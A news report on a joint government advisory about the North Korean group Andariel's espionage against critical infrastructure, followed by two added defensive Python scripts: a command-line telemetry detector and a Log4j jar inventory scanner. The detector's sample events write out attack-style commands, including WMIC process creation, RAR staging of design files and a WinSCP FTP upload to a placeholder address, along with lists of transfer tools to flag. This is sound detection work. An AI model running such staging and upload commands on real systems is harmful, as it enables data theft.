Britain, the US and South Korea have warned of a global espionage campaign by a North Korean-sponsored cyber threat actor, designed to advance the regime’s military and nuclear ambitions.

The joint government advisory explained how the group, known as Andariel, has compromised critical national infrastructure (CNI) organizations to access sensitive and classified technical information and intellectual property data.

The threat actor primarily targets organizations in the defense, aerospace, energy, nuclear and engineering industries to exfiltrate information such as contract details, design drawings and project specifications.

The group works on behalf of the Pyongyang government, using the intelligence gathered to expand its military and nuclear programs.

Andariel has also been observed carrying out ransomware attacks against US healthcare organizations as a means of raising funds to finance further espionage activity.

The authoring agencies assess that Andariel is part of the Third Bureau of the Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB).


The group and its cyber techniques pose a constant threat to a range of industry sectors worldwide.

Paul Chichester, director of operations at the UK’s National Cyber Security Centre (NCSC), commented: “The global cyber espionage operation we uncovered today shows that state-sponsored actors in the DPRK are ready to move forward with their military and nuclear programs.”

He added: “This should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”

How Andariel Targets CNI Organizations

The advisory highlighted that Andariel primarily exploits known software vulnerabilities, such as Log4j, to gain initial access to target networks.

The group identifies potentially vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in publicly exposed web servers.


Andariel has been observed researching several major vulnerabilities as part of its reconnaissance process. These include Apache ActiveMQ, MOVEit, Barracuda Email Security Gateway, GoAnywhere MFT and Log4j.

After initial access, the group leverages custom tools and malware for discovery and execution. This includes the development of a wide range of remote access trojans (RATs) to enable remote access, system manipulation and lateral movement.

These tools include functionality designed for data discovery and exfiltration, including execution of arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing files, capturing network connections, and uploading content to command and control (C2) servers.

Andariel also leverages open source and publicly available tools, such as 3Proxy, AsyncRAT and WinRAR.

Using such publicly available tooling helps the attackers hide and obfuscate their identity, making attribution difficult.

Living-off-the-Land Techniques

The threat actors are well-versed in living-off-the-land techniques, using the tools and processes already present within compromised networks. These are used to support tasks such as defense evasion, credential access, discovery and lateral movement.

These include legitimate tools such as the Windows command line, PowerShell and the Windows Management Instrumentation Command Line (WMIC).

The agencies observed that Andariel has a preference for using netstat commands. Typos and other mistakes are often made, indicating that the commands are not copied directly from a playbook and that the actors have a flexible, improvised style, as well as a poor grasp of English.

The actors routinely pack late-stage tooling with VMProtect and Themida, which have advanced anti-debugging and anti-detection capabilities.

They change settings on compromised systems to force them to store credentials, then use the aforementioned tools to steal those credentials.

Infrastructure around the world is used to send commands to compromised systems, with malware traffic disguised as ordinary network traffic inside HTTP packets.

Data Exfiltration

To collect data, the threat actors use malware previously placed on the network to search for files that may be of interest, scanning computer files for keywords related to the defense and military fields in English and Korean.

They then identify the data to steal by enumerating files and folders across many directories and servers, using command-line activity or functionality built into their custom tools. The matching files are collected into RAR archives.

Finally, data is exfiltrated directly from victims’ networks to web services such as cloud storage, or to servers not connected to the primary C2 infrastructure, including actor-controlled cloud-based service accounts.

The actors have also been seen using PuTTY and WinSCP to exfiltrate data via File Transfer Protocol (FTP) and other protocols to North Korean-controlled servers.
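The living-off-the-land behaviour described above (netstat and WMIC discovery with hand-typed mistakes), the staging of files into RAR archives and the use of PuTTY/WinSCP to move them out can all be surfaced from endpoint command-line telemetry. The script below is an added example written for this article, not tooling from the advisory or the authoring agencies; the host names, user names, command lines, IP address and time window are constructed for illustration. It tags individual events and then correlates an archive being created on a host with a transfer tool starting on the same host shortly afterwards:

```python
"""Flag Andariel-style living-off-the-land, staging and transfer activity in
Windows command-line telemetry. Constructed example: events, hosts, users and
the 30-minute window are illustrative assumptions, not data from the advisory."""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in discovery binaries named in the advisory (netstat, WMIC) plus a few
# other common living-off-the-land commands (assumption for this example).
LOTL_BINARIES = {"netstat", "wmic", "whoami", "tasklist", "systeminfo", "ipconfig"}
ARCHIVERS = {"rar", "winrar"}                                   # staging into RAR archives
TRANSFER_TOOLS = {"winscp", "pscp", "psftp", "plink", "putty"}  # PuTTY / WinSCP family


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch hand-typed misspellings such as 'netsat'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def program_name(cmdline: str) -> str:
    """First token of the command line reduced to a bare, lowercase program name."""
    tokens = shlex.split(cmdline, posix=False)   # non-POSIX: keeps Windows backslashes intact
    if not tokens:
        return ""
    first = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return first[:-4] if first.endswith(".exe") else first


def classify(event: dict) -> list:
    """Tag one command-line event; an event may carry several tags."""
    tokens = shlex.split(event["cmdline"], posix=False)
    name = program_name(event["cmdline"])
    tags = []
    if name in LOTL_BINARIES:
        tags.append("lotl")
    elif len(name) >= 5 and any(edit_distance(name, b) == 1 for b in LOTL_BINARIES):
        # A near-miss of a known binary is a keyboard-driven mistake, not a scripted playbook.
        # Such a command spawns no process, so it is only visible in shell or EDR console logs.
        tags.append("lotl-typo")
    if name in ARCHIVERS and len(tokens) > 1 and tokens[1].lower() == "a":
        tags.append("archive-staging")   # 'rar a <archive> <files>' creates an archive
    if name in TRANSFER_TOOLS:
        tags.append("transfer-tool")
    return tags


def detect(events: list, window: timedelta = timedelta(minutes=30)) -> list:
    """Return (host, tag, cmdline) findings, adding a correlated 'staging-then-transfer'
    finding when a transfer tool starts within `window` of an archive being created."""
    findings = []
    staged = defaultdict(list)   # host -> timestamps of archive creation
    for ev in sorted(events, key=lambda e: e["time"]):
        tags = classify(ev)
        findings.extend((ev["host"], t, ev["cmdline"]) for t in tags)
        if "archive-staging" in tags:
            staged[ev["host"]].append(ev["time"])
        if "transfer-tool" in tags and any(ev["time"] - t <= window for t in staged[ev["host"]]):
            findings.append((ev["host"], "staging-then-transfer", ev["cmdline"]))
    return findings


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"time": datetime(2024, 7, 25, 9, 58), "host": "WS01", "user": "jsmith",
     "cmdline": r"notepad.exe C:\Users\jsmith\report.txt"},
    {"time": datetime(2024, 7, 25, 10, 0), "host": "WS01", "user": "jsmith",
     "cmdline": r"C:\Windows\System32\netstat.exe -ano"},
    {"time": datetime(2024, 7, 25, 10, 1), "host": "WS01", "user": "jsmith",
     "cmdline": "netsat -ano"},                        # typo: hands on keyboard
    {"time": datetime(2024, 7, 25, 10, 5), "host": "SRV02", "user": "svc_web",
     "cmdline": "wmic process call create cmd.exe"},
    {"time": datetime(2024, 7, 25, 10, 10), "host": "SRV02", "user": "svc_web",
     "cmdline": r"rar.exe a -r C:\Temp\d.rar D:\Projects\*.dwg"},
    {"time": datetime(2024, 7, 25, 10, 22), "host": "SRV02", "user": "svc_web",
     "cmdline": r'"C:\Program Files\WinSCP\WinSCP.exe" /command "open ftp://198.51.100.7" "put C:\Temp\d.rar"'},
]

if __name__ == "__main__":
    for host, tag, cmd in detect(SAMPLE_EVENTS):
        print(f"{host:6} {tag:22} {cmd}")
```

The per-event tags are noisy on their own (administrators run netstat too); the correlated `staging-then-transfer` finding and the typo heuristic are the ones worth alerting on, and in practice the user and parent process would be added to the key so that a web-service account driving WinSCP stands out from an administrator doing the same.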

How to Mitigate Andariel Attacks

The advisory identifies several areas on which CNI defenders should focus to mitigate the tactics used by Andariel. These include:

  • Identify assets affected by the Log4j vulnerability, and upgrade them to the latest version
  • Maintain an inventory of systems and applications, apply patches quickly as they are released, place vulnerable or potentially risky systems behind reverse proxies that require authentication, and prevent exploitation by deploying and configuring web application firewalls (WAFs).
  • Deploy endpoint agents or other monitoring mechanisms to prevent and detect further adversarial activity.
  • Monitor for suspicious command-line activity, implement multi-factor authentication for remote access services, and properly distribute and use authorization tools for critical assets.
  • Encrypt all sensitive data, including personal information.
  • Block access to unused ports.
  • Change passwords when they are suspected of being compromised.
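The first mitigation, identifying assets affected by the Log4j vulnerability, starts with knowing which archives on a host still carry the `JndiLookup` class that CVE-2021-44228 abused. The script below is an added example for this article, not tooling from the advisory; it walks a directory tree, opens every jar/war/ear, descends into archives nested inside them (for example `WEB-INF/lib/*.jar` inside a war), reads the `Implementation-Version` from the manifest and flags anything older than 2.17.1 (that threshold, and the constructed sample tree it builds for itself, are assumptions made for illustration):

```python
"""Inventory Log4j 2 archives under a directory tree and flag those that still
ship the JndiLookup class. Added example, not the advisory's tooling; the
2.17.1 threshold and the constructed sample tree are assumptions."""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 17, 1)          # assumption: anything older is reported as needing upgrade
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); stops at the first component with no digits."""
    parts = []
    for piece in text.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts) or None


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_archive(zf, path, findings):
    """Record the archive if it contains JndiLookup, then recurse into nested archives."""
    names = zf.namelist()
    if JNDI_LOOKUP in names:
        version = manifest_version(zf)
        parsed = parse_version(version) if version else None
        findings.append({
            "path": path,
            "version": version,
            # An unknown version is reported as needing attention, never assumed safe.
            "needs_upgrade": parsed is None or parsed < FIXED_VERSION,
        })
    for name in names:                  # e.g. WEB-INF/lib/*.jar inside a .war
        if name.lower().endswith(ARCHIVE_EXTS):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{path}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan(root):
    """Walk `root` and return one finding per archive that carries JndiLookup."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXTS):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    inspect_archive(zf, full, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _fake_jar(version, with_jndi):
    """In-memory jar with a manifest and, optionally, a stub JndiLookup entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")   # stub bytes, not a real class
    return buf.getvalue()


def build_sample_tree():
    """Constructed test data: an old core jar, a fixed one, an unrelated jar and a
    .war embedding the old jar. Returns the temporary directory that holds them."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    for fname, version, jndi in [("log4j-core-2.14.1.jar", "2.14.1", True),
                                 ("log4j-core-2.17.1.jar", "2.17.1", True),
                                 ("commons-io.jar", "2.11.0", False)]:
        with open(os.path.join(root, fname), "wb") as f:
            f.write(_fake_jar(version, jndi))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_jar("2.14.1", True))
    return root


if __name__ == "__main__":
    for hit in scan(build_sample_tree()):
        status = "UPGRADE" if hit["needs_upgrade"] else "ok"
        print(f"{status:8} {hit['version'] or '?':8} {hit['path']}")
```

Run it against an application directory instead of the sample tree to produce the inventory; shaded or repackaged copies of Log4j may lack a manifest version, which is why an unreadable version is reported rather than silently passed.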
